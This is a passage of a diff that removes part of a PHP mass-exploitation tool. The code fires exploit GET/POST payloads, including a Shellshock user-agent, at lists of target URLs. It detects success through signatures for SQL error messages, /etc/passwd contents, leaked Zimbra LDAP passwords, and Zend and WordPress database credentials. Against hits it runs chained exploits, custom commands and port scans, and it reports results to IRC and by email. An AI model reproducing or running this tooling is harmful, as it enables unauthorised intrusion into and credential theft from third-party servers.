- curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ?
- $_SESSION['config']['file-cookie'] : 'cookie.txt');
-
- curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ?
- $_SESSION['config']['file-cookie'] : 'cookie.txt');
-
- curl_multi_add_handle($mh, $curl_array[$i]);
- }
- $running = NULL;
- do {
-
- usleep(100);
- curl_multi_exec($mh, $running);
- } while ($running > 0);
- $ret = array();
- foreach ($nodes as $i => $url) {
-
- $ret[0] = curl_multi_getcontent($curl_array[$i]);
- $ret[1] = curl_getinfo($curl_array[$i]);
- $ret[2] = curl_error($curl_array[$i]);
- }
- foreach ($nodes as $i => $url) {
- curl_multi_remove_handle($mh, $curl_array[$i]);
- }
-
- $status = NULL;
- preg_match_all('(HTTP.*)', $ret[0], $status['http']);
- preg_match_all('(Server:.*)', $ret[0], $status['server']);
- preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
-
- __plus();
- $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}"));
- __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
-
- __plus();
- __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
-
- __plus();
- curl_multi_close($mh) . unlink('cookie.txt');
-
- __plus();
- unset($curl_array);
- return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
-}
-
-################################################################################
-#CAPTURE INFORMATION SERVER AND VALIDATE FAULTS#################################
-################################################################################
-
-function __infoServer($url_, $postDados = NULL) {
-
- __plus();
- $_SESSION['config']['verifica_info'] = 1;
- $resultado = __request_info($url_, $_SESSION["config"]["proxy"], $postDados);
- __plus();
- if (isset($resultado['corpo'])) {
- if (!is_null($_SESSION['config']['extrai-email'])) {
-
- __plus();
- return __extractEmail($resultado['corpo'], $url_);
- }
-
- if (!is_null($_SESSION['config']['extrai-url'])) {
-
- __plus();
- return __extractURLs($resultado['corpo'], $url_);
- }
-
- if (not_isnull_empty($_SESSION['config']['regexp-filter'])) {
-
- __plus();
- return __extractRegCustom($resultado['corpo'], $url_);
- }
-
- if (not_isnull_empty($_SESSION['config']['target']) && $_SESSION['config']['tipoerro'] == 5) {
-
- __plus();
- return __checkURLs($resultado, $url_);
- }
-
- $ifcode = not_isnull_empty($_SESSION['config']['ifcode']) &&
- strstr($resultado['server']['http_code'], $_SESSION['config']['ifcode']) ?
- "CODE_HTTP_FOUND: {$_SESSION['config']['ifcode']} / " : NULL;
-
-
- $ifredirect = not_isnull_empty($_SESSION['config']['ifredirect']) &&
- (strstr($resultado['server']['redirect_url'], $_SESSION['config']['ifredirect'])) ?
- 'VALUE URL REDIRECT FOUND' : NULL;
-
- $_SESSION['config']['erroReturn'] = $ifredirect . $ifcode . __checkError($resultado['corpo']);
- __plus();
- $_SESSION['config']['curl_getinfo'] = $resultado['server'];
- $_SESSION['config']['error_conection'] = (not_isnull_empty($resultado['error']) ? $resultado['error'] : NULL);
- $_SESSION['config']['server_ip'] = (!is_null($resultado['server']['primary_ip']) ? $resultado['server']['primary_ip'] : NULL);
- $_SESSION['config']['vull_style'] = (not_isnull_empty($_SESSION['config']['erroReturn'])) ?
- "{$_SESSION["c4"]}( POTENTIALLY VULNERABLE ){$_SESSION["c0"]} \033[1m \033[32m" . __cli_beep() : NULL;
- $_SESSION['config']['resultado_valores'].=(not_isnull_empty($_SESSION['config']['erroReturn'])) ? "{$url_}\n" : NULL;
- __plus();
- $url_ = ($_SESSION['config']['alexa-rank']) ? ", RANK ALEXA: " . __positionAlexa($url_) : NULL;
- __plus();
- $_SESSION['config']['info_ip'] = __infoIP($resultado['server']['primary_ip'], 1);
- __plus();
- } else {
- return FALSE;
- }
- __plus();
-
- return "{$resultado['info']}, IP:{$resultado['server']['primary_ip']}:{$resultado['server']['primary_port']} {$url_}";
-}
-
-################################################################################
-#ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF MOTOR#####################
-################################################################################
-
-function __processUrlExec($url, $contUrl) {
-
- __plus();
- if (is_null($url) || empty($url)) {
-
- return FALSE;
- }
-
- $host = (!is_null($_SESSION['config']['replace'])) ?
- __replace($_SESSION['config']['replace'], urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url))) :
- urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url));
-
- $target_['url_xpl'] = __remove($_SESSION['config']['remove'], __mountURLExploit(!is_null($_SESSION['config']['url']) ? $_SESSION['config']['url'] . $host : $host));
- $info = __infoServer($target_['url_xpl'], $_SESSION['config']['exploit-post']);
- $target_['url_clean'] = ($_SESSION['config']['tipoerro'] == 4) ? $_SESSION['config']['url'] . $host : urldecode($url);
-
- __plus();
-
- if ($_SESSION['config']['tipoerro'] != 5 && is_null($_SESSION['config']['extrai-email']) &&
- is_null($_SESSION['config']['extrai-url']) && is_null($_SESSION['config']['regexp-filter'])) {
-
- $ifredirect = strstr($_SESSION['config']['curl_getinfo']['redirect_url'], $_SESSION['config']['ifredirect']) ?
- "{$_SESSION["c4"]}{$_SESSION['config']['curl_getinfo']['redirect_url']}" : NULL;
- $exget = (not_isnull_empty($_SESSION['config']['exploit-get']) ? ' _/GET=> ' . $_SESSION['config']['exploit-get'] : NULL);
- $expost = (not_isnull_empty($_SESSION['config']['exploit-post']) ? ' _/POST=> ' . $_SESSION['config']['exploit-post_str'] : NULL);
- $valid_return = (not_isnull_empty($_SESSION['config']['erroReturn'])) ? TRUE : FALSE;
- $info = ($valid_return) ? "{$_SESSION["c4"]}{$info}" : $info;
- $target_ip = ($valid_return) ? "{$_SESSION["c4"]}{$_SESSION['config']['info_ip']}" : $_SESSION['config']['info_ip'];
-
- $anime = ($valid_return) ? '[ ! ]' : '[ - ]';
- echo __plus() . "\n";
-
- echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]}|_[ + ] [{$_SESSION["c1"]} {$contUrl} / {$_SESSION['config']['total_url']} {$_SESSION["c1"]}]{$_SESSION["c9"]}-[" . date("H:i:s") . "]{$_SESSION["c1"]} {$anime} {$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Target:: {$_SESSION["c1"]}[{$_SESSION["c9"]} {$_SESSION['config']['vull_style']}{$target_['url_clean']}{$_SESSION["c1"]} ]{$_SESSION["c0"]}\n";
- echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Exploit:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$exget}{$expost}{$_SESSION["c0"]}\n";
- echo (not_isnull_empty($_SESSION['config']['replace'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Replace:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['replace']}{$_SESSION["c0"]}\n") : NULL;
- echo (not_isnull_empty($_SESSION['config']['remove'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Remove:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['remove']}{$_SESSION["c0"]}\n") : NULL;
- echo (isset($_SESSION['config']['cms-check-resultado'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}CMS check:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['cms-check-resultado']}{$_SESSION["c0"]}\n") : NULL;
- echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Information Server:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$info}{$_SESSION["c1"]}\n";
- echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}More details:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$target_ip}{$_SESSION["c1"]}\n";
- echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Found:: {$_SESSION["c9"]}" . ($valid_return ? "{$_SESSION["c4"]}{$_SESSION['config']['erroReturn']}" : "UNIDENTIFIED") . "{$_SESSION["c0"]}";
- echo (not_isnull_empty($ifredirect) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}URL REDIRECT:: {$_SESSION["c9"]}{$ifredirect}{$_SESSION["c0"]}" : NULL);
- echo (not_isnull_empty($_SESSION['config']['error_conection']) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}ERROR CONECTION:: {$_SESSION["c2"]}{$_SESSION['config']['error_conection']}{$_SESSION["c0"]}" : NULL);
- ($valid_return ? __saveValue($_SESSION['config']['arquivo_output'], $target_['url_xpl'], 1) : NULL);
- echo ($_SESSION['config']['sendmail'] ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}SEND MAIL:: {$_SESSION["c9"]}" . (($valid_return) ? "{$_SESSION["c4"]}" : NULL) . __sendMail($_SESSION['config']['sendmail'], $target_['url_xpl']) . "{$_SESSION["c0"]}" : NULL);
- (not_isnull_empty($_SESSION['config']['arquivo_output_all']) ? __saveValue($_SESSION['config']['arquivo_output_all'], $target_['url_xpl'], NULL) : NULL);
- __plus();
-
- if ($valid_return) {
-
- (not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ?
- __ircMsg($_SESSION['config']['irc'], "{$_SESSION['config']['erroReturn']}::: {$target_['url_xpl']}") : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
- __configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
- __plus();
- }
-
- (not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['sub-file']) &&
- is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['exploit-all-id']) ? __configExploitsExec($_SESSION['config']['exploit-all-id'], $target_) : NULL);
- __plus();
-
- ($_SESSION['config']['robots'] ? __getValuesRobots($host) : NULL);
- __plus();
-
- (not_isnull_empty($_SESSION['config']['port-scan']) ? __portScan(array(0 => $target_, 1 => $_SESSION['config']['port-scan'])) : NULL);
- __plus();
-
- __timeSec('delay', "\n");
- }
-}
-
-################################################################################
-#PRINT MESSAGE AND OUT OF THE PROCESS###########################################
-################################################################################
-
-function __getOut($msg) {
- __ircQuit($_SESSION['config']['irc']);
- print_r($msg);
- exit(1);
-}
-
-################################################################################
-#ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF ENGINE####################
-################################################################################
-
-function __process($resultadoURL) {
-
- __plus();
- $resultadoURL[0] = (is_array($resultadoURL) ? array_unique(array_filter($resultadoURL)) : $resultadoURL);
- $resultadoURL[0] = ($_SESSION['config']['unique'] ? __filterDomainUnique($resultadoURL[0]) : $resultadoURL[0]);
-
- $resultadoURL[0] = (not_isnull_empty($_SESSION['config']['ifurl']) ? __filterURLif($resultadoURL[0]) : $resultadoURL[0]);
- $_SESSION['config']['total_url'] = count($resultadoURL[0]);
-
- echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c12"]}[ TOTAL FOUND VALUES ]::{$_SESSION["c1"]} [ {$_SESSION['config']['total_url']} ]{$_SESSION["c0"]}\n";
- __debug(array('debug' => $resultadoURL[0], 'function' => '__process'), 3);
-
- if (count($resultadoURL[0]) > 0) {
-
- $_SESSION['config']['irc']['irc_connection'] = (not_isnull_empty($_SESSION['config']['irc']['conf']) ? __ircConect($_SESSION['config']['irc']) : NULL);
- $_SESSION['config']['irc']['my_fork'] = pcntl_fork();
-
- if ($_SESSION['config']['irc']['my_fork'] == 0) {
-
- (not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ? __ircPong($_SESSION['config']['irc']) : NULL);
- exit(0);
- } else if ($_SESSION['config']['irc']['my_fork'] == -1) {
-
- __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}ERROR Fork failed{$_SESSION["c0"]}\n");
- }
-
- $_SESSION['config']['user-agent'] = ($_SESSION['config']['shellshock']) ? $_SESSION['config']['user_agent_xpl'] : $_SESSION['config']['user-agent'];
- foreach ($resultadoURL[0] as $url) {
-
- __plus();
- $url = urldecode(not_isnull_empty($_SESSION['config']['target']) ?
- $_SESSION['config']['target'] . $url : $url);
-
- if (__validateURL($url) || not_isnull_empty($_SESSION['config']['abrir-arquivo'])) {
-
- __processUrlExec(__filterURLTAG($url), $_SESSION["config"]["contUrl"] ++);
- __plus();
- }
- }
- } else {
-
- print_r("{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]} Not a satisfactory result was found!{$_SESSION["c0"]}\n");
- }
-}
-
-################################################################################
-#ERRORS STANDARDS OF SCRIPT VALIDATE WITH HTML RECEIVED#########################
-################################################################################
-
-function __checkError($html_) {
-
-
- if (__validateOptions($_SESSION['config']['tipoerro'], '2')) {
-
- $validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
- }
-
- if (__validateOptions('1,3,4', $_SESSION['config']['tipoerro'])) {
-
- if (__validateOptions('3,4', $_SESSION['config']['tipoerro'])) {
-
- $validation['ERROR-CUSTOM'] = not_isnull_empty($_SESSION['config']['achar']) ? $_SESSION['config']['achar'] : NULL;
- }
-
- /* [*]SHELLSHOCK
- * (CVE-2014-6271, CVE-2014-6277,
- * CVE-2014-6278, CVE-2014-7169,
- * CVE-2014-7186, CVE-2014-7187)
- * is a vulnerability in GNU's bash shell that gives attackers access
- * to run remote commands on a vulnerable system. */
- $validation['SHELLSHOCK-01'] = '99887766555';
-
- /* [*]LOCAL FILE INCLUSION
- * Local File Inclusion (also known as LFI) is the process of including
- * files, that are already locally present on the server, through the
- * exploiting of vulnerable inclusion procedures implemented in the
- * application.
- * https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion */
- $validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
- $validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
- $validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
-
- /* [*]ZIMBRA MAIL
- * Zimbra 0day exploit / Privilegie escalation via LFI
- * This script exploits a Local File Inclusion in
- * /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
- * which allows us to see localconfig.xml
- * that contains LDAP root credentials wich allow us to make requests in
- * /service/admin/soap API with the stolen LDAP credentials to create user
- * with administration privlegies
- * and gain acces to the Administration Console.
- * https://www.exploit-db.com/exploits/30085/ */
- $validation['ZIMBRA-WEB-MAIL-01'] = 'zimbra_user';
- $validation['ZIMBRA-WEB-MAIL-02'] = 'zimbra_ldap_password';
- $validation['ZIMBRA-WEB-MAIL-03'] = 'ldap_replication_password';
- $validation['ZIMBRA-WEB-MAIL-04'] = 'ldap_root_password';
- $validation['ZIMBRA-WEB-MAIL-05'] = 'ldap_nginx_password';
- $validation['ZIMBRA-WEB-MAIL-06'] = 'mailboxd_keystore_password';
- $validation['ZIMBRA-WEB-MAIL-07'] = 'zimbra_mysql_password';
- $validation['ZIMBRA-WEB-MAIL-08'] = 'mysql_root_password';
- $validation['ZIMBRA-WEB-MAIL-10'] = 'mailboxd_truststore_password';
- $validation['ZIMBRA-WEB-MAIL-11'] = 'ldap_postfix_password';
- $validation['ZIMBRA-WEB-MAIL-12'] = 'ldap_amavis_password';
-
- /* [*]ZEND FRAMEWORK
- * Zend-Framework Full Info Disclosure
- * The username and password of the database may be obtained trough
- * the "application.ini" file
- * https://www.exploit-db.com/exploits/29921/ */
- $validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
- $validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
- $validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
- $validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
- $validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';
-
- /* [*]CMS WORDPRESS
- * As the name suggests, if the web application doesn’t check the file
- * name required by the user, any malicious user can exploit this
- * vulnerability to download sensitive files from the server.
- * Arbitrary File Download vulnerability file wp-config.php
- * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
- * http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure */
- $validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
- $validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
- $validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
- $validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
-
- /* [*]ERROR MARIADB
- * MariaDB is a drop-in replacement for MySQL.
- * MariaDB strives to be the logical choice for database professionals
- * looking for a robust, scalable, and reliable SQL server. To accomplish
- * this, the MariaDB Foundation work closely and cooperatively with the
- * larger community of users and developers in the true spirit of Free
- * and open source software, and release software in a manner that
- * balances predictability with reliability.
- * https://mariadb.org/en/about/ */
- $validation['MARIADB-01'] = 'MariaDB server version for the right syntax';
-
- /* [*]ERROR MYSQL
- * MySQL is a database management system (DBMS), which uses the SQL
- * (Structured Query Language, English Structured Query Language) as
- * interface. It is currently one of the most popular databases, with
- * more than 10 million installations worldwide
- * https://www.mysql.com/
- * http://php.net/manual/en/security.database.sql-injection.php
- */
- $validation['MYSQL-AND-MARIADB'] = 'You have an error in your SQL syntax;';
- $validation['MYSQL-03'] = 'Warning: mysql_';
- $validation['MYSQL-04'] = 'function.mysql';
- $validation['MYSQL-05'] = 'MySQL result index';
- $validation['MYSQL-07'] = 'MySQL Error';
- $validation['MYSQL-08'] = 'MySQL ODBC';
- $validation['MYSQL-09'] = 'MySQL Driver';
- $validation['MYSQL-10'] = 'mysqli.query';
- $validation['MYSQL-11'] = 'num_rows';
- $validation['MYSQL-12'] = 'mysql error:';
- $validation['MYSQL-13'] = 'supplied argument is not a valid MySQL result resource';
- $validation['MYSQL-14'] = 'on MySQL result index';
- $validation['MYSQL-15'] = 'Error Executing Database Query';
- $validation['MYSQL-01'] = 'mysql_';
-
- /* [*]ERROR MICROSOFT
- * MICROSOFT TECHNOLOGY
- * http://www.microsoft.com/pt-br/server-cloud/products/sql-server/
- * https://products.office.com/pt-br/access
- * https://www.owasp.org/index.php/Testing_for_SQL_Server */
- $validation['MICROSOFT-01'] = 'Microsoft JET Database';
- $validation['MICROSOFT-02'] = 'ADODB.Recordset';
- $validation['MICROSOFT-03'] = '500 - Internal server error';
- $validation['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
- $validation['MICROSOFT-05'] = 'Unclosed quotes';
- $validation['MICROSOFT-06'] = 'ADODB.Command';
- $validation['MICROSOFT-07'] = 'ADODB.Field error';
- $validation['MICROSOFT-08'] = 'Microsoft VBScript';
- $validation['MICROSOFT-09'] = 'Microsoft OLE DB Provider for SQL Server';
- $validation['MICROSOFT-10'] = 'Unclosed quotation mark';
- $validation['MICROSOFT-11'] = 'Microsoft OLE DB Provider for Oracle';
- $validation['MICROSOFT-14'] = 'Active Server Pages error';
- $validation['MICROSOFT-15'] = 'OLE/DB provider returned message';
- $validation['MICROSOFT-16'] = 'OLE DB Provider for ODBC';
- $validation['MICROSOFT-17'] = "error '800a0d5d'";
- $validation['MICROSOFT-18'] = "error '800a000d'";
- $validation['MICROSOFT-19'] = 'Unclosed quotation mark after the character string';
- $validation['MICROSOFT-20'] = '[Microsoft][SQL Server Native Client 11.0][SQL Server]';
- $validation['MICROSOFT-21'] = 'Warning: odbc_';
-
- /* #[*]ERROR ORACLE
- * - DBMS currently marketed by Oracle, who was born in 1979 and was
- * the first relational BD sold worldwide;
- * - Latest version: Oracle Database 11G;
- * http://www.oracle.com/br/solutions/midsize/oracle-products/database/index.html
- * https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf */
- $validation['ORACLE-01'] = 'ORA-00921: unexpected end of SQL command';
- $validation['ORACLE-02'] = 'ORA-01756';
- $validation['ORACLE-03'] = 'ORA-';
- $validation['ORACLE-04'] = 'Oracle ODBC';
- $validation['ORACLE-05'] = 'Oracle Error';
- $validation['ORACLE-06'] = 'Oracle Driver';
- $validation['ORACLE-07'] = 'Oracle DB2';
- $validation['ORACLE-08'] = 'error ORA-';
- $validation['ORACLE-09'] = 'SQL command not properly ended';
-
- /* #[*]ERROR DB2
- * DB2 is a database system Relational Manager (SGDBR) produced by IBM.
- * There are different versions of DB2 running from a simple PDA |
- * handheld, even in powerful mainframes and run on servers based on
- * Unix, Windows, or Linux.
- * http://www-01.ibm.com/software/br/db2/lowerdatabasecosts/
- * https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#DB2_Escaping */
- $validation['DB2-01'] = 'DB2 ODBC';
- $validation['DB2-02'] = 'DB2 error';
- $validation['DB2-03'] = 'DB2 Driver';
-
- /* #[*]ERROR ODBC
- * ODBC (acronym for Open Database Connectivity) is a standard for
- * access to managers of database systems (DBMS).
- * https://support.office.com/pt-br/article/Administrar-fontes-de-dados-ODBC-b19f856b-5b9b-48c9-8b93-07484bfab5a7
- * https://www.exploit-db.com/papers/12975/ */
- $validation['ODBC-01'] = 'ODBC SQL';
- $validation['ODBC-02'] = 'ODBC DB2';
- $validation['ODBC-03'] = 'ODBC Driver';
- $validation['ODBC-04'] = 'ODBC Error';
- $validation['ODBC-05'] = 'ODBC Microsoft Access';
- $validation['ODBC-06'] = 'ODBC Oracle';
- $validation['ODBC-07'] = 'ODBC Microsoft Access Driver';
-
- /* #[*]ERROR POSTGRESQL
- * PostgreSQL is an object-relational database management system
- * (ORDBMS), developed as an open source project.
- * http://www.postgresql.org.br/old/
- * https://www.owasp.org/index.php/OWASP_Backend_Security_Project_Testing_PostgreSQL */
- $validation['POSTGRESQL-01'] = 'Warning: pg_';
- $validation['POSTGRESQL-02'] = 'PostgreSql Error:';
- $validation['POSTGRESQL-03'] = 'function.pg';
- $validation['POSTGRESQL-04'] = 'Supplied argument is not a valid PostgreSQL result';
- $validation['POSTGRESQL-05'] = 'PostgreSQL query failed: ERROR: parser: parse error';
- $validation['POSTGRESQL-06'] = 'pg_';
-
- /* #[*]ERROR SYBASE
- * Sybase (NYSE: SY), an SAP company, is a software company that
- * produces services and products related to information management,
- * mobility, messaging, development tools, and data warehousing and
- * OLAP data.
- * https://www.owasp.org/index.php?search=SYBASE&title=Special%3ASearch&go=Go */
- $validation['SYBASE-01'] = 'Warning: sybase_';
- $validation['SYBASE-02'] = 'function.sybase';
- $validation['SYBASE-03'] = 'Sybase result index';
- $validation['SYBASE-04'] = 'Sybase Error:';
- $validation['SYBASE-05'] = 'Sybase: Server message:';
- $validation['SYBASE-06'] = 'sybase_';
- $validation['SYBASE-07'] = '[Sybase][ODBC Driver]:';
-
- /* #[*]ERROR JBOSSWEB
- * JBoss Web Server is an enterprise ready web server designed for
- * medium and large applications, based on Tomcat.
- * JBoss Web a component of the JBoss Application Server, there are
- * no more standalone version of JBoss Web you need the Application
- * Server to get the Servlet/JSP container.
- * http://jbossweb.jboss.org/
- * http://www.rapid7.com/db/search?utf8=%E2%9C%93&q=JBoss+&t=a */
- $validation['JBOSSWEB-01'] = 'java.sql.SQLSyntaxErrorException: ORA-';
- $validation['JBOSSWEB-02'] = 'org.springframework.jdbc.BadSqlGrammarException:';
- $validation['JBOSSWEB-03'] = 'javax.servlet.ServletException:';
- $validation['JBOSSWEB-04'] = 'java.lang.NullPointerException';
-
- /* #[*]ERROR JDBC
- * Java Database Connectivity or JDBC is a set of classes and
- * interfaces (API) written in Java that make sending SQL statements
- * for any relational database
- * http://www.oracle.com/technetwork/java/javase/jdbc/index.html
- * https://www.owasp.org/index.php/Preventing_SQL_Injection_in_Java */
- $validation['JDBC_CFM-01'] = 'Error Executing Database Query';
- $validation['JDBC_CFM-02'] = 'SQLServer JDBC Driver';
- $validation['JDBC_CFM-03'] = 'JDBC SQL';
- $validation['JDBC_CFM-04'] = 'JDBC Oracle';
- $validation['JDBC_CFM-05'] = 'JDBC MySQL';
- $validation['JDBC_CFM-06'] = 'JDBC error';
- $validation['JDBC_CFM-07'] = 'JDBC Driver';
-
- /* #[*]JAVA INFINITYDB
- * InfinityDB is an all-Java embedded database engine that is deployed
- * in handheld devices, on servers, on workstations, and in distributed
- * settings. */
- $validation['JAVA-INFINITYDB-01'] = 'java.io.IOException: InfinityDB';
-
- /* #[*]ERROR PHP
- * The PHP development team announces the immediate availability of
- * PHP 5.4.40. 14 security-related bugs were fixed in this release,
- * including CVE-2014-9709, CVE-2015-2301, CVE-2015-2783, CVE-2015-1352.
- * All PHP 5.4 users are encouraged to upgrade to this version.
- * http://php.net/ */
- $validation['ERRORPHP-01'] = 'Warning: include';
- $validation['ERRORPHP-02'] = 'Fatal error: include';
- $validation['ERRORPHP-03'] = 'Warning: require';
- $validation['ERRORPHP-04'] = 'Fatal error: require';
- $validation['ERRORPHP-05'] = 'ADODB_Exception';
- $validation['ERRORPHP-06'] = 'Warning: include(';
- $validation['ERRORPHP-07'] = 'Warning: require_once(';
- $validation['ERRORPHP-08'] = 'function.include';
- $validation['ERRORPHP-09'] = 'Disallowed Parent Path';
- $validation['ERRORPHP-10'] = 'function.require';
- $validation['ERRORPHP-11'] = 'Warning: main(';
- $validation['ERRORPHP-12'] = 'Warning: session_start()';
- $validation['ERRORPHP-13'] = 'Warning: getimagesize()';
- $validation['ERRORPHP-16'] = 'Warning: array_merge()';
- $validation['ERRORPHP-17'] = 'Warning: preg_match()';
- $validation['ERRORPHP-18'] = 'GetArray()';
- $validation['ERRORPHP-19'] = 'FetchRow()';
- $validation['ERRORPHP-20'] = 'Warning: preg_';
- $validation['ERRORPHP-21'] = 'Warning: ociexecute()';
- $validation['ERRORPHP-22'] = 'Warning: ocifetchstatement()';
- $validation['ERRORPHP-23'] = 'PHP Warning:';
-
- /* #[*]ERROR ASP
- * The ASP (Active Server Pages), also known as Classic ASP today, is a
- * framework of basic libraries (and not a language) for processing of
- * scripting languages on the server side to generate dynamic content on
- * the Web
- * http://www.asp.net/ */
- $validation['ERRORASP-01'] = 'Version Information: Microsoft .NET Framework';
- $validation['ERRORASP-04'] = 'ASP.NET is configured to show verbose error messages';
- $validation['ERRORASP-05'] = 'BOF or EOF';
- $validation['ERRORASP-06'] = 'Unclosed quotation mark';
- $validation['ERRORASP-06'] = 'Error converting data type varchar to numeric';
-
- /* #[*]ERROR LUA
- * Lua is a scripting language imperative, procedural, small, reflective
- * and light, designed to expand applications in general, to be an
- * extensible language (which connects parts of a program made in more
- * than one language)
- * http://www.lua.org/ */
- $validation['ERRORLUA-01'] = 'LuaPlayer ERROR:';
- $validation['ERRORLUA-02'] = 'CGILua message';
- $validation['ERRORLUA-03'] = 'Lua error';
-
- #[*]ERROR INDEFINIDOS
- $validation['INDEFINITE-01'] = 'Incorrect syntax near';
- $validation['INDEFINITE-02'] = 'Fatal error';
- $validation['INDEFINITE-04'] = 'Invalid Querystring';
- $validation['INDEFINITE-05'] = 'Input string was not in a correct format';
- $validation['INDEFINITE-06'] = 'An illegal character has been found in the statement';
-
- #[*]SHELL SCRIPT backdoored.
- $validation['SHELL-01'] = 'c99shell';
- $validation['SHELL-02'] = 'C99Shell v';
- $validation['SHELL-03'] = '